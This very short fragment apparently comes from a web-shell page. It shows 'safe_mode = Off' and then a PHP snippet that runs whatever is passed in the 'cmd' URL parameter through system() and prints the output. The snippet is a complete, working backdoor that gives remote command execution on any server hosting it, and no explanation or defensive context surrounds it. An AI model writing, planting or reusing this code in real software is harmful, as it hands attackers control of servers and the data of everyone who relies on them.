safe_mode = Off






<pre>

if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}

</pre>